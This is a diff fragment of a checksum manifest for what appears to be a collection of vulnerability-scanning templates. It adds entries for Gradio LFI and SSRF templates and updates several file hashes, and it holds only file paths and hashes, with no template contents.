 http/misconfiguration/corebos-htaccess.yaml:01e578f80bbcf2552413ed4bf039cda8123fb19b
 http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b
 http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce
@@ -6828,7 +6842,7 @@ http/technologies/google/cloud-run-default-page.yaml:91ff90b29a400729fd8dbef4aaf
 http/technologies/google/firebase-detect.yaml:fa2021156b4a3de1e257f610042c076d83ecab21
 http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827baa9
 http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d
-http/technologies/google/google-storage.yaml:f43cd532e5f0230d310a4e0f856add1ecb8dd333
+http/technologies/google/google-storage.yaml:6f4b77b2ce984d502f781974800f1940805db18c
 http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb
 http/technologies/gotweb-detect.yaml:9490354702dedc1297a7c0c812954a05efb475d0
 http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29
@@ -7645,6 +7659,8 @@ http/vulnerabilities/gitlab/gitlab-rce.yaml:173dd50897b2956f85fce08f9730f740415e
 http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:969333f355e024ef605152fe26bb45511f20f4ad
 http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:8d551aa4f723d8e79ee57beb2f491c86f5b6cffc
 http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:83312ba18791464992c70dd4fe10965ba1ed2244
+http/vulnerabilities/gradio/gradio-lfi.yaml:a69850b3a69de67b39650086e3b710acd4ae465b
+http/vulnerabilities/gradio/gradio-ssrf.yaml:c0a20caa4fb295071efb720890b54bee093c0fda
 http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704
 http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f
 http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54
@@ -7717,7 +7733,7 @@ http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a
 http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15
 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3
 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f
-http/vulnerabilities/nuxt/nuxt-js-xss.yaml:136a0b904e00e30b73c966536aa6f4110be49e39
+http/vulnerabilities/nuxt/nuxt-js-xss.yaml:9d37aae5f57e72101d40715ef24bb1fa7cf527d4
 http/vulnerabilities/opencpu/opencpu-rce.yaml:d13458a710e74a36c6b74a216677b4a40a9562d0
 http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:cbfc4feae73c9796e2cde0471a9891ae967a1655
 http/vulnerabilities/oracle/oracle-ebs-xss.yaml:a395970ecf5cd11fc483b759836bc4402f2489ce
@@ -8646,7 +8662,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
-templates-checksum.txt:73a443496d5bda8552e1e38ab4b09951ff8b0139
+templates-checksum.txt:86bac7e8379bf85b45635c5c2ba0558fa72032eb
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4